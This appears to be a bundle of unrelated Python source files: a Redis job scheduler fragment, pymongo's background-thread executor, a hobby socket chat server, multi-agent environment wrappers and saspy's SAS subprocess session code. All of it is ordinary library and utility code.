if issubclass(connection_class, UnixDomainSocketConnection):
# The connection keyword arguments are obtained from
# `UnixDomainSocketConnection`, which expects `path`, but passed to
# `redis.client.Redis`, which expects `unix_socket_path`, renaming
# the key is necessary.
# `path` is not left in the dictionary as that keyword argument is
# not expected by `redis.client.Redis` and would raise an exception.
self._connection_kwargs['unix_socket_path'] = self._connection_kwargs.pop(
'path'
)
self._connection = None
self.interval = interval
self._stop_requested = False
self._status = self.Status.STOPPED
self._process = None
self.log = logging.getLogger(__name__)
setup_loghandlers(
level=logging_level,
name=__name__,
log_format=log_format,
date_format=date_format,
)
@property
def connection(self):
if self._connection:
return self._connection
self._connection = self._connection_class(**self._connection_kwargs)
return self._connection
@property
def acquired_locks(self):
return self._acquired_locks
@property
def status(self):
return self._status
@property
def should_reacquire_locks(self):
"""Returns True if lock_acquisition_time is longer than 10 minutes ago"""
if self._queue_names == self.acquired_locks:
return False
if not self.lock_acquisition_time:
return True
return (datetime.now() - self.lock_acquisition_time).total_seconds() > 600
def acquire_locks(self, auto_start=False):
"""Returns names of queue it successfully acquires lock on"""
successful_locks = set()
pid = os.getpid()
self.log.info("Trying to acquire locks for %s", ", ".join(self._queue_names))
for name in self._queue_names:
if self.connection.set(self.get_locking_key(name), pid, nx=True, ex=60):
successful_locks.add(name)
# Always reset _scheduled_job_registries when acquiring locks
self._scheduled_job_registries = []
self._acquired_locks = self._acquired_locks.union(successful_locks)
self.lock_acquisition_time = datetime.now()
# If auto_start is requested and scheduler is not started,
# run self.start()
if self._acquired_locks and auto_start:
if not self._process:
self.start()
return successful_locks
def prepare_registries(self, queue_names=None):
"""Prepare scheduled job registries for use"""
self._scheduled_job_registries = []
if not queue_names:
queue_names = self._acquired_locks
for name in queue_names:
self._scheduled_job_registries.append(
ScheduledJobRegistry(name, connection=self.connection)
)
@classmethod
def get_locking_key(cls, name):
"""Returns scheduler key for a given queue name"""
return SCHEDULER_LOCKING_KEY_TEMPLATE % name
def enqueue_scheduled_jobs(self):
"""Enqueue jobs whose timestamp is in the past"""
self._status = self.Status.WORKING
if not self._scheduled_job_registries and self._acquired_locks:
self.prepare_registries()
for registry in self._scheduled_job_registries:
timestamp = current_timestamp()
# TODO: try to use Lua script to make get_jobs_to_schedule()
# and remove_jobs() atomic
job_ids = registry.get_jobs_to_schedule(timestamp)
if not job_ids:
continue
queue = Queue(registry.name, connection=self.connection)
with self.connection.pipeline() as pipeline:
jobs = Job.fetch_many(job_ids, connection=self.connection)
for job in jobs:
if job is not None:
queue.enqueue_job(job, pipeline=pipeline)
registry.remove(job, pipeline=pipeline)
pipeline.execute()
self._status = self.Status.STARTED
def _install_signal_handlers(self):
"""Installs signal handlers for handling SIGINT and SIGTERM
gracefully.
"""
signal.signal(signal.SIGINT, self.request_stop)
signal.signal(signal.SIGTERM, self.request_stop)
def request_stop(self, signum=None, frame=None):
"""Toggle self._stop_requested that's checked on every loop"""
self._stop_requested = True
def heartbeat(self):
"""Updates the TTL on scheduler keys and the locks"""
self.log.debug("Scheduler sending heartbeat to %s",
", ".join(self.acquired_locks))
if len(self._queue_names) > 1:
with self.connection.pipeline() as pipeline:
for name in self._queue_names:
key = self.get_locking_key(name)
pipeline.expire(key, self.interval + 5)
pipeline.execute()
else:
key = self.get_locking_key(next(iter(self._queue_names)))
self.connection.expire(key, self.interval + 5)
def stop(self):
self.log.info("Scheduler stopping, releasing locks for %s...",
','.join(self._queue_names))
self.release_locks()
self._status = self.Status.STOPPED
def release_locks(self):
"""Release acquired locks"""
keys = [self.get_locking_key(name) for name in self._queue_names]
self.connection.delete(*keys)
self._acquired_locks = set()
def start(self):
self._status = self.Status.STARTED
# Redis instance can't be pickled across processes so we need to
# clean this up before forking
self._connection = None
self._process = Process(target=run, args=(self,), name='Scheduler')
self._process.start()
return self._process
def work(self):
self._install_signal_handlers()
while True:
if self._stop_requested:
self.stop()
break
if self.should_reacquire_locks:
self.acquire_locks()
self.enqueue_scheduled_jobs()
self.heartbeat()
time.sleep(self.interval)
def run(scheduler):
scheduler.log.info("Scheduler for %s started with PID %s",
','.join(scheduler._queue_names), os.getpid())
try:
scheduler.work()
except: # noqa
scheduler.log.error(
'Scheduler [PID %s] raised an exception.\n%s',
os.getpid(), traceback.format_exc()
)
raise
scheduler.log.info("Scheduler with PID %s has stopped", os.getpid())
def parse_names(queues_or_names):
"""Given a list of strings or queues, returns queue names"""
names = []
for queue_or_name in queues_or_names:
if isinstance(queue_or_name, Queue):
names.append(queue_or_name.name)
else:
names.append(str(queue_or_name))
return names
|
periodic_executor.py | # Copyright 2014-2015 MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you
# may not use this file except in compliance with the License. You
# may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied. See the License for the specific language governing
# permissions and limitations under the License.
"""Run a target function on a background thread."""
import atexit
import threading
import time
import weakref
from pymongo.monotonic import time as _time
class PeriodicExecutor(object):
def __init__(self, interval, min_interval, target, name=None):
""""Run a target function periodically on a background thread.
If the target's return value is false, the executor stops.
:Parameters:
- `interval`: Seconds between calls to `target`.
- `min_interval`: Minimum seconds between calls if `wake` is
called very often.
- `target`: A function.
- `name`: A name to give the underlying thread.
"""
# threading.Event and its internal condition variable are expensive
# in Python 2, see PYTHON-983. Use a boolean to know when to wake.
# The executor's design is constrained by several Python issues, see
# "periodic_executor.rst" in this repository.
self._event = False
self._interval = interval
self._min_interval = min_interval
self._target = target
self._stopped = False
self._thread = None
self._name = name
def open(self):
"""Start. Multiple calls have no effect.
Not safe to call from multiple threads at once.
"""
self._stopped = False
started = False
try:
started = self._thread and self._thread.is_alive()
except ReferenceError:
# Thread terminated.
pass
if not started:
thread = threading.Thread(target=self._run, name=self._name)
thread.daemon = True
self._thread = weakref.proxy(thread)
_register_executor(self)
thread.start()
def close(self, dummy=None):
"""Stop. To restart, call open().
The dummy parameter allows an executor's close method to be a weakref
callback; see monitor.py.
"""
self._stopped = True
def join(self, timeout=None):
if self._thread is not None:
try:
self._thread.join(timeout)
except (ReferenceError, RuntimeError):
# Thread already terminated, or not yet started.
pass
def wake(self):
"""Execute the target function soon."""
self._event = True
def _run(self):
while not self._stopped:
try:
if not self._target():
self._stopped = True
break
except:
self._stopped = True
raise
deadline = _time() + self._interval
while not self._stopped and _time() < deadline:
time.sleep(self._min_interval)
if self._event:
break # Early wake.
self._event = False
# _EXECUTORS has a weakref to each running PeriodicExecutor. Once started,
# an executor is kept alive by a strong reference from its thread and perhaps
# from other objects. When the thread dies and all other referrers are freed,
# the executor is freed and removed from _EXECUTORS. If any threads are
# running when the interpreter begins to shut down, we try to halt and join
# them to avoid spurious errors.
_EXECUTORS = set()
def _register_executor(executor):
ref = weakref.ref(executor, _on_executor_deleted)
_EXECUTORS.add(ref)
def _on_executor_deleted(ref):
_EXECUTORS.remove(ref)
def _shutdown_executors():
if _EXECUTORS is None:
return
# Copy the set. Stopping threads has the side effect of removing executors.
executors = list(_EXECUTORS)
# First signal all executors to close...
for ref in executors:
executor = ref()
if executor:
executor.close()
# ...then try to join them.
for ref in executors:
executor = ref()
if executor:
executor.join(1)
executor = None
atexit.register(_shutdown_executors)
|
SERVER.py | import socket
import threading
import pyfiglet
from pyfiglet import Figlet
import os
#clear screen
os.system('cls' if os.name == 'nt' else 'clear')
#aTAG LINE
print('''\033[5;31;40m
_____ _____
__| _ |__ ____ _ _____ ______ _____ __| _ |__ _____ _____ _____ ____ ______
| | | | || \ | || \ | ___|| | | |_| | |/ \/ \| \ | || ___|
| |_| | || \| || \| ___|| \ | _ | || || || \| || ___|
|______| __||__/\____||______/|______||__|\__\|__| |_| __|\_____/\_____/|______/|____||______|
|_____| |_____|
\033[0;34;40m
\033[5;34;40m
______ _______
.' ___ ||_ __ \
______ / .' \_| | |__) | SERVER*
|______|| | | __ /
\ `.___.'\ _| | \ \_
`.____ .'|____| |___| v.BETA
\033[0;31;40m
\033[1;32;40m
-OJASWA RHX V.01 (2021)
#YOUR OWN PRIVATE CHAT ROOMS
\033[0;37;40m
''')
#DATA
host="127.0.0.1"
#assign name to server
port=int(input("\033[0;32;40m Enter A Free Port [4444,1500,1604,1716] : \033[0;35;40m"))
servername= (input("\033[0;32;40m ENTER THE SERVER NAME : \033[0;35;40m"))
from pyfiglet import Figlet
rectanglefont = Figlet(font='rectangles')
#delete above
os.system('cls' if os.name == 'nt' else 'clear')
print(rectanglefont.renderText(servername)+"\033[0;32;40m SERVER STARTED \033[5;32;40m \033[0;37;40m")
#server startup
server=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
server.bind((host,port))
cport=server.getsockname()[1]
print(f"\033[2;32;40m Socket created using [Port] : {cport}\n")
server.listen()
print(f"Start dynamic IP using [ngrok tcp {port}] \033[0;37;40m\n")
#Clients & Names
clients=[]
names=[]
print("\033[5;31;40m LISTENING.....\033[0;31;40m\n")
#function to send messges to all connected clients
def broadcast(message):
for client in clients:
client.send(message)
#function to handling connected clients over network
def handle(client):
while True:
try:
#broadcast message
message=client.recv(1024)
broadcast(message)
except:
#if client gets diconnected
index=clients.index(client)
clients.remove(client)
client.close()
name=names[index]
broadcast('\033[1;35;40m {} \033[5;31;40m left! \033[0;31;40m'.format(name).encode('ascii'))
print(f"\033[1;35;40m {name} \033[5;34;40m LEFT SERVER! \033[0;34;40m")
names.remove(name)
break
#recieving /listening adding clients
def receive():
while True:
#Accept Entry
client,address=server.accept()
print(f"\033[1;33;40m Connected with {str(address)}\033[0;37;40m")
#implementing and storing names
client.send("HOODIE".encode("ascii"))
name=client.recv(1024).decode("ascii")
names.append(name)
clients.append(client)
#broadcast names
print(f"\033[1;31;40m {name} \033[0;37;40m \033[5;31;40m CONNECTED ! \033[0;31;40m")
broadcast("\033[1;33;40m {} joined !\033[2;32;40m".format(name).encode('ascii'))
client.send("\033[5;31;40m Connected to server! \033[0;31;40m \033[0;37;40m ".encode("ascii"))
client.send(rectanglefont.renderText(servername).encode("ascii"))
client.send("Ctrl+C/Z/X To leave the server ! ".encode("ascii"))
#handling Thread for clients
thread=threading.Thread(target=handle,args=(client,))
thread.start()
receive()
|
env_wrappers.py | """
Modified from OpenAI Baselines code to work with multi-agent envs
"""
import numpy as np
from multiprocessing import Process, Pipe
from baselines.common.vec_env import VecEnv, CloudpickleWrapper
def worker(remote, parent_remote, env_fn_wrapper):
parent_remote.close()
env = env_fn_wrapper.x()
while True:
cmd, data = remote.recv()
if cmd == 'step':
ob, reward, done, info = env.step(data)
if all(done):
ob = env.reset()
remote.send((ob, reward, done, info))
elif cmd == 'reset':
ob = env.reset()
remote.send(ob)
elif cmd == 'reset_task':
ob = env.reset_task()
remote.send(ob)
elif cmd == 'close':
remote.close()
break
elif cmd == 'get_spaces':
remote.send((env.observation_space, env.action_space))
elif cmd == 'get_agent_types':
try:
if all([hasattr(a, 'adversary') for a in env.agents]):
remote.send(['adversary' if a.adversary else 'agent' for a in
env.agents])
else:
remote.send(['agent' for _ in env.agents])
except AttributeError:
remote.send(['agent' for _ in range(env.n)])
else:
raise NotImplementedError
class SubprocVecEnv(VecEnv):
def __init__(self, env_fns, spaces=None):
"""
envs: list of gym environments to run in subprocesses
"""
self.waiting = False
self.closed = False
nenvs = len(env_fns)
self.remotes, self.work_remotes = zip(*[Pipe() for _ in range(nenvs)])
self.ps = [Process(target=worker, args=(work_remote, remote, CloudpickleWrapper(env_fn)))
for (work_remote, remote, env_fn) in zip(self.work_remotes, self.remotes, env_fns)]
for p in self.ps:
p.daemon = True # if the main process crashes, we should not cause things to hang
p.start()
for remote in self.work_remotes:
remote.close()
self.remotes[0].send(('get_spaces', None))
observation_space, action_space = self.remotes[0].recv()
self.remotes[0].send(('get_agent_types', None))
self.agent_types = self.remotes[0].recv()
VecEnv.__init__(self, len(env_fns), observation_space, action_space)
def step_async(self, actions):
for remote, action in zip(self.remotes, actions):
remote.send(('step', action))
self.waiting = True
def step_wait(self):
results = [remote.recv() for remote in self.remotes]
self.waiting = False
obs, rews, dones, infos = zip(*results)
return np.stack(obs), np.stack(rews), np.stack(dones), infos
def reset(self):
for remote in self.remotes:
remote.send(('reset', None))
return np.stack([remote.recv() for remote in self.remotes])
def reset_task(self):
for remote in self.remotes:
remote.send(('reset_task', None))
return np.stack([remote.recv() for remote in self.remotes])
def close(self):
if self.closed:
return
if self.waiting:
for remote in self.remotes:
remote.recv()
for remote in self.remotes:
remote.send(('close', None))
for p in self.ps:
p.join()
self.closed = True
class DummyVecEnv(VecEnv):
def __init__(self, env_fns):
self.envs = [fn() for fn in env_fns]
env = self.envs[0]
VecEnv.__init__(self, len(env_fns), env.observation_space, env.action_space)
try:
if all([hasattr(a, 'adversary') for a in env.agents]):
self.agent_types = ['adversary' if a.adversary else 'agent' for a in
env.agents]
else:
self.agent_types = ['agent' for _ in env.agents]
except AttributeError:
self.agent_types = ['agent' for _ in range(env.n)]
self.ts = np.zeros(len(self.envs), dtype='int')
self.actions = None
def step_async(self, actions):
self.actions = actions
def step_wait(self):
results = [env.step(a) for (a,env) in zip(self.actions, self.envs)]
obs, rews, dones, infos = map(np.array, zip(*results))
self.ts += 1
for (i, done) in enumerate(dones):
if all(done):
obs[i] = self.envs[i].reset()
self.ts[i] = 0
self.actions = None
return np.array(obs), np.array(rews), np.array(dones), infos
def reset(self):
results = [env.reset() for env in self.envs]
return np.array(results)
def close(self):
return |
sasiostdio.py | #
# Copyright SAS Institute
#
# Licensed under the Apache License, Version 2.0 (the License);
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
if os.name != 'nt':
import fcntl
import signal
import subprocess
import tempfile as tf
from time import sleep
import socket as socks
import codecs
import select as sel
import warnings
import io
try:
import pandas as pd
import numpy as np
except ImportError:
pass
if os.name == 'nt':
from queue import Queue, Empty
from threading import Thread
class SASconfigSTDIO:
"""
This object is not intended to be used directly. Instantiate a SASsession object instead
"""
def __init__(self, session, **kwargs):
self._kernel = kwargs.get('kernel', None)
SAScfg = session._sb.sascfg.SAScfg
self.name = session._sb.sascfg.name
cfg = getattr(SAScfg, self.name)
self.saspath = cfg.get('saspath', '')
self.options = cfg.get('options', [])
self.ssh = cfg.get('ssh', '')
self.identity = cfg.get('identity', None)
self.luser = cfg.get('luser', None)
self.tunnel = cfg.get('tunnel', None)
self.rtunnel = cfg.get('rtunnel', None)
self.port = cfg.get('port', None)
self.host = cfg.get('host', '')
self.encoding = cfg.get('encoding', '')
self.metapw = cfg.get('metapw', '')
self.lrecl = cfg.get('lrecl', None)
self.iomc = cfg.get('iomc', '')
localhost = cfg.get('localhost', None)
try:
self.outopts = getattr(SAScfg, "SAS_output_options")
self.output = self.outopts.get('output', 'html5')
except:
self.output = 'html5'
if self.output.lower() not in ['html', 'html5']:
print("Invalid value specified for SAS_output_options. Using the default of HTML5")
self.output = 'html5'
# GET Config options
try:
self.cfgopts = getattr(SAScfg, "SAS_config_options")
except:
self.cfgopts = {}
lock = self.cfgopts.get('lock_down', True)
# in lock down mode, don't allow runtime overrides of option values from the config file.
self.verbose = self.cfgopts.get('verbose', True)
self.verbose = kwargs.get('verbose', self.verbose)
insaspath = kwargs.get('saspath', '')
if len(insaspath) > 0:
if lock and len(self.saspath):
print("Parameter 'saspath' passed to SAS_session was ignored due to configuration restriction.")
else:
self.saspath = insaspath
inoptions = kwargs.get('options', '')
if len(inoptions) > 0:
if lock and len(self.options):
print("Parameter 'options' passed to SAS_session was ignored due to configuration restriction.")
else:
self.options = inoptions
inssh = kwargs.get('ssh', '')
if len(inssh) > 0:
if lock and len(self.ssh):
print("Parameter 'ssh' passed to SAS_session was ignored due to configuration restriction.")
else:
self.ssh = inssh
inident = kwargs.get('identity', None)
if inident is not None:
if lock:
print("Parameter 'identity' passed to SAS_session was ignored due to configuration restriction.")
else:
self.identity = inident
inluser = kwargs.get('luser', None)
if inluser is not None:
if lock:
print("Parameter 'luser' passed to SAS_session was ignored due to configuration restriction.")
else:
self.luser = inluser
intunnel = kwargs.get('tunnel', None)
if intunnel is not None:
if lock:
print("Parameter 'tunnel' passed to SAS_session was ignored due to configuration restriction.")
else:
self.tunnel = intunnel
inrtunnel = kwargs.get('rtunnel', None)
if inrtunnel is not None:
if lock:
print("Parameter 'rtunnel' passed to SAS_session was ignored due to configuration restriction.")
else:
self.rtunnel = inrtunnel
inport = kwargs.get('port', None)
if inport is not None:
if lock:
print("Parameter 'port' passed to SAS_session was ignored due to configuration restriction.")
else:
self.port = inport
inloc = kwargs.get('localhost', None)
if inloc is not None:
if lock and localhost is not None:
print("Parameter 'localhost' passed to SAS_session was ignored due to configuration restriction.")
else:
localhost = inloc
inhost = kwargs.get('host', '')
if len(inhost) > 0:
if lock and len(self.host):
print("Parameter 'host' passed to SAS_session was ignored due to configuration restriction.")
else:
self.host = inhost
inencoding = kwargs.get('encoding', 'NoOverride')
if inencoding !='NoOverride':
if lock and len(self.encoding):
print("Parameter 'encoding' passed to SAS_session was ignored due to configuration restriction.")
else:
self.encoding = inencoding
if not self.encoding:
self.encoding = '' # 'utf-8'
if self.encoding != '':
try:
coinfo = codecs.lookup(self.encoding)
except LookupError:
print("The encoding provided ("+self.encoding+") doesn't exist in this Python session. Setting it to ''.")
print("The correct encoding will attempt to be determined based upon the SAS session encoding.")
self.encoding = ''
inlrecl = kwargs.get('lrecl', None)
if inlrecl:
if lock and self.lrecl:
print("Parameter 'lrecl' passed to SAS_session was ignored due to configuration restriction.")
else:
self.lrecl = inlrecl
if not self.lrecl:
self.lrecl = 1048576
self._prompt = session._sb.sascfg._prompt
if localhost is not None:
self.hostip = localhost
else:
self.hostip = socks.gethostname()
try:
x = subprocess.Popen(('nslookup', self.hostip), stdout=subprocess.PIPE)
z = x.stdout.read()
ip = z.rpartition(b'Address:')[2].strip().decode()
try:
socks.gethostbyaddr(ip)
self.hostip = ip
except:
pass
x.terminate()
except:
pass
return
class SASsessionSTDIO():
"""
The SASsession object is the main object to instantiate and provides access to the rest of the functionality.
cfgname - value in SAS_config_names List of the sascfg_personal.py file
kernel - None - internal use when running the SAS_kernel notebook
saspath - overrides saspath Dict entry of cfgname in sascfg_personal.py file
options - overrides options Dict entry of cfgname in sascfg_personal.py file
encoding - This is the python encoding value that matches the SAS session encoding of the IOM server you are connecting to
autoexec - This is a string of SAS code that will be submitted upon establishing a connection.
ssh - full path of the ssh command; /usr/bin/ssh for instance
host - host name of the remote machine
identity - path to an .ppk identity file to be used with the ssh -i option
port - (Optional: integer) The ssh port of the remote machine (equivalent to invoking ssh with the -p option)
tunnel - (Optional: integer) Certain methods of saspy require opening a local port and accepting data streamed from the SAS instance.
"""
#def __init__(self, cfgname: str ='', kernel: '<SAS_kernel object>' =None, saspath :str ='', options: list =[]) -> '<SASsession object>':
def __init__(self, **kwargs):
self.pid = None
self.stdin = None
self.stderr = None
self.stdout = None
self._sb = kwargs.get('sb', None)
self._log_cnt = 0
self._log = ""
self.sascfg = SASconfigSTDIO(self, **kwargs)
self._startsas()
return
def __del__(self):
if self.pid:
self._endsas()
self._sb.SASpid = None
def _logcnt(self, next=True):
if next == True:
self._log_cnt += 1
return '%08d' % self._log_cnt
def _buildcommand(self, sascfg):
if sascfg.ssh:
pgm = sascfg.ssh
parms = [pgm]
parms += ["-t"]
if sascfg.identity:
parms += ["-i", sascfg.identity]
if sascfg.port:
parms += ["-p", str(sascfg.port)]
if sascfg.tunnel:
parms += ["-R", '%d:localhost:%d' % (sascfg.tunnel,sascfg.tunnel)]
if sascfg.rtunnel:
parms += ["-L", '%d:localhost:%d' % (sascfg.rtunnel,sascfg.rtunnel)]
if sascfg.luser:
parms += [sascfg.luser+'@'+sascfg.host, sascfg.saspath]
else:
parms += [sascfg.host, sascfg.saspath]
if sascfg.output.lower() == 'html':
print("""HTML4 is only valid in 'local' mode (SAS_output_options in sascfg_personal.py).
Please see SAS_config_names templates 'default' (STDIO) or 'winlocal' (IOM) in the sample sascfg.py.
Will use HTML5 for this SASsession.""")
sascfg.output = 'html5'
else:
pgm = sascfg.saspath
parms = [pgm]
# temporary hack for testing grid w/ sasgsub and iomc ...
if sascfg.iomc:
pgm = sascfg.iomc
parms = [pgm]
parms += ["user", "sas", "pw", "sas"]
parms += ['']
elif sascfg.metapw:
pgm = sascfg.ssh
parms = [pgm]
parms += ["-t", "-i", "/u/sastpw/idrsacnn", sascfg.host]
parms += sascfg.options
#parms += ['"'+sascfg.saspath+' -nodms -stdio -terminal -nosyntaxcheck -pagesize MAX"']
parms += ['']
else:
parms += sascfg.options
parms += ["-nodms"]
parms += ["-stdio"]
parms += ["-terminal"]
parms += ["-nosyntaxcheck"]
parms += ["-pagesize", "MAX"]
parms += ['']
return [pgm, parms]
def _startsas(self):
if self.pid:
return self.pid
pgm, parms = self._buildcommand(self.sascfg)
s = ''
for i in range(len(parms)):
s += parms[i]+' '
if os.name == 'nt':
try:
self.pid = subprocess.Popen(parms, bufsize=0, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
pid = self.pid.pid
except OSError as e:
print("The OS Error was:\n"+e.strerror+'\n')
print("SAS Connection failed. No connection established. Double check your settings in sascfg_personal.py file.\n")
print("Attempted to run program "+pgm+" with the following parameters:"+str(parms)+"\n")
print("If no OS Error above, try running the following command (where saspy is running) manually to see what is wrong:\n"+s+"\n")
return None
else:
PIPE_READ = 0
PIPE_WRITE = 1
pin = os.pipe()
pout = os.pipe()
perr = os.pipe()
try:
pidpty = os.forkpty()
except:
import pty
pidpty = pty.fork()
if pidpty[0]:
# we are the parent
pid = pidpty[0]
os.close(pin[PIPE_READ])
os.close(pout[PIPE_WRITE])
os.close(perr[PIPE_WRITE])
else:
# we are the child
signal.signal(signal.SIGINT, signal.SIG_DFL)
os.close(0)
os.close(1)
os.close(2)
os.dup2(pin[PIPE_READ], 0)
os.dup2(pout[PIPE_WRITE], 1)
os.dup2(perr[PIPE_WRITE], 2)
os.close(pin[PIPE_READ])
os.close(pin[PIPE_WRITE])
os.close(pout[PIPE_READ])
os.close(pout[PIPE_WRITE])
os.close(perr[PIPE_READ])
os.close(perr[PIPE_WRITE])
try:
#sleep(5)
os.execv(pgm, parms)
except OSError as e:
print("The OS Error was:\n"+e.strerror+'\n')
print("SAS Connection failed. No connection established. Double check your settings in sascfg_personal.py file.\n")
print("Attempted to run program "+pgm+" with the following parameters:"+str(parms)+"\n")
print("If no OS Error above, try running the following command (where saspy is running) manually to see what is wrong:\n"+s+"\n")
os._exit(-6)
except:
print("Subprocess failed to start. Double check your settings in sascfg_personal.py file.\n")
os._exit(-6)
if os.name == 'nt':
try:
self.pid.wait(1)
error = self.pid.stderr.read(4096).decode()+'\n'
error += self.pid.stdout.read(4096).decode()
print("Java Error:\n"+error)
print("Subprocess failed to start. Double check your settings in sascfg_personal.py file.\n")
print("Attempted to run program "+pgm+" with the following parameters:"+str(parms)+"\n")
print("If no Java Error above, try running the following command (where saspy is running) manually to see if it's a problem starting Java:\n"+s+"\n")
self.pid = None
return None
except:
# lame windows can't do non-blocking I/O
self.stdout = Queue()
self.stderr = Queue()
self.to = Thread(target=self._read_out, args=())
self.te = Thread(target=self._read_err, args=())
self.to.daemon = True
self.te.daemon = True
self.to.start()
self.te.start()
self.stdin = self.pid.stdin
else:
self.pid = pidpty[0]
self.stdin = os.fdopen(pin[PIPE_WRITE], mode='wb')
self.stderr = os.fdopen(perr[PIPE_READ], mode='rb')
self.stdout = os.fdopen(pout[PIPE_READ], mode='rb')
fcntl.fcntl(self.stdout, fcntl.F_SETFL, os.O_NONBLOCK)
fcntl.fcntl(self.stderr, fcntl.F_SETFL, os.O_NONBLOCK)
rc = os.waitpid(self.pid, os.WNOHANG)
if rc[0] != 0:
self.pid = None
self._sb.SASpid = None
lst = self.stdout.read1(4096)
print("stdout from subprocess is:\n"+lst.decode())
if self.pid is None:
print("SAS Connection failed. No connection established. Double check your settings in sascfg_personal.py file.\n")
print("Attempted to run program "+pgm+" with the following parameters:"+str(parms)+"\n")
print("Try running the following command (where saspy is running) manually to see if you can get more information on what went wrong:\n"+s+"\n")
return None
else:
enc = self.sascfg.encoding #validating encoding is done next, so handle it not being set for this one call
if enc == '':
self.sascfg.encoding = 'utf-8'
ll = self.submit("options svgtitle='svgtitle'; options validvarname=any validmemname=extend; ods graphics on;", "text")
self.sascfg.encoding = enc
if self.pid is None:
print("SAS Connection failed. No connection established. Double check your settings in sascfg_personal.py file.\n")
print("Attempted to run program "+pgm+" with the following parameters:"+str(parms)+"\n")
print("Try running the following command (where saspy is running) manually to see if you can get more information on what went wrong:\n"+s+"\n")
return None
if self.sascfg.verbose:
pid = self.pid if os.name != 'nt' else self.pid.pid
print("SAS Connection established. Subprocess id is "+str(pid)+"\n")
return self.pid
if os.name == 'nt':
def _read_out(self):
while True:
lst = self.pid.stdout.read(4096)
if lst == b'':
break
self.stdout.put(lst)
def _read_err(self):
while True:
log = self.pid.stderr.read(4096)
if log == b'':
break
self.stderr.put(log)
def _endsas(self):
rc = 0
ret = None
if self.pid:
code = b";*\';*\";*/;\n;quit;endsas;\n"
self._getlog(wait=1)
if self.pid:
out = self.stdin.write(code)
self.stdin.flush()
#self._asubmit(code,'text')
sleep(1)
if self.pid:
if os.name == 'nt':
pid = self.pid.pid
try:
rc = self.pid.wait(5)
except (subprocess.TimeoutExpired):
if self.sascfg.verbose:
print("SAS didn't shutdown w/in 5 seconds; killing it to be sure")
self.pid.kill()
self.to.join(5)
self.te.join(5)
else:
pid = self.pid
x = 5
while True:
rc = os.waitpid(self.pid, os.WNOHANG)
if rc[0] != 0:
break
x = x - 1
if x < 1:
break
sleep(1)
if rc[0] != 0:
pass
else:
if self.sascfg.verbose:
print("SAS didn't shutdown w/in 5 seconds; killing it to be sure")
os.kill(self.pid, signal.SIGKILL)
if self.sascfg.verbose:
print("SAS Connection terminated. Subprocess id was "+str(pid))
self.pid = None
self._sb.SASpid = None
return ret
def _getlog(self, wait=5, jobid=None):
logf = b''
quit = wait * 2
logn = self._logcnt(False)
code1 = "%put E3969440A681A24088859985"+logn+";\nE3969440A681A24088859985"+logn
if os.name == 'nt':
try:
rc = self.pid.wait(0)
self.pid = None
return 'SAS process has terminated unexpectedly. RC from wait was: '+str(rc)
except:
pass
else:
rc = os.waitpid(self.pid, os.WNOHANG)
if rc[0] != 0:
self.pid = None
self._sb.SASpid = None
return 'SAS process has terminated unexpectedly. Pid State= '+str(rc)
while True:
if os.name == 'nt':
try:
log = self.stderr.get_nowait()
except Empty:
log = b''
else:
log = self.stderr.read1(4096)
if len(log) > 0:
logf += log
else:
quit -= 1
if quit < 0 or len(logf) > 0:
break
sleep(0.5)
x = logf.decode(self.sascfg.encoding, errors='replace').replace(code1, " ")
self._log += x
if x.count('ERROR:') > 0:
warnings.warn("Noticed 'ERROR:' in LOG, you ought to take a look and see if there was a problem")
self._sb.check_error_log = True
if self.pid == None:
self._sb.SASpid = None
return "No SAS process attached. SAS process has terminated unexpectedly."
if os.name == 'nt':
try:
rc = self.pid.wait(0)
self.pid = None
return 'SAS process has terminated unexpectedly. RC from wait was: '+str(rc)
except:
pass
else:
rc = os.waitpid(self.pid, os.WNOHANG)
if rc[0] != 0:
self.pid = None
self._sb.SASpid = None
return 'SAS process has terminated unexpectedly. Pid State= '+str(rc)
return x
def _getlst(self, wait=5, jobid=None):
lstf = b''
quit = wait * 2
eof = 0
bof = False
lenf = 0
while True:
if os.name == 'nt':
try:
lst = self.stdout.get_nowait()
except Empty:
lst = b''
else:
lst = self.stdout.read1(4096)
if len(lst) > 0:
lstf += lst
if ((not bof) and lst.count(b"<!DOCTYPE html>", 0, 20) > 0):
bof = True
else:
lenf = len(lstf)
if (lenf > 15):
eof = lstf.count(b"</html>", (lenf - 15), lenf)
if (eof > 0):
break
if not bof:
quit -= 1
if quit < 0:
break
sleep(0.5)
if self.pid == None:
self._sb.SASpid = None
return "No SAS process attached. SAS process has terminated unexpectedly."
if os.name == 'nt':
try:
rc = self.pid.wait(0)
self.pid = None
return 'SAS process has terminated unexpectedly. RC from wait was: '+str(rc)
except:
pass
else:
rc = os.waitpid(self.pid, os.WNOHANG)
if rc[0] != 0:
self.pid = None
self._sb.SASpid = None
return 'SAS process has terminated unexpectedly. Pid State= '+str(rc)
if eof:
return lstf.decode(errors='replace')
else:
return lstf.decode(self.sascfg.encoding, errors='replace')
def _getlsttxt(self, wait=5, jobid=None):
f2 = [None]
lstf = b''
quit = wait * 2
eof = 0
self._asubmit("data _null_;file print;put 'Tom was here';run;", "text")
while True:
if os.name == 'nt':
try:
lst = self.stdout.get_nowait()
except Empty:
lst = b''
else:
lst = self.stdout.read1(4096)
if len(lst) > 0:
lstf += lst
lenf = len(lstf)
eof = lstf.find(b"Tom was here", lenf - 25, lenf)
if (eof != -1):
final = lstf.partition(b"Tom was here")
f2 = final[0].decode(self.sascfg.encoding, errors='replace').rpartition(chr(12))
break
lst = f2[0]
if self.pid == None:
self._sb.SASpid = None
return "No SAS process attached. SAS process has terminated unexpectedly."
if os.name == 'nt':
try:
rc = self.pid.wait(0)
self.pid = None
return 'SAS process has terminated unexpectedly. RC from wait was: '+str(rc)
except:
pass
else:
rc = os.waitpid(self.pid, os.WNOHANG)
if rc[0] != 0:
self.pid = None
self._sb.SASpid = None
return 'SAS process has terminated unexpectedly. Pid State= '+str(rc)
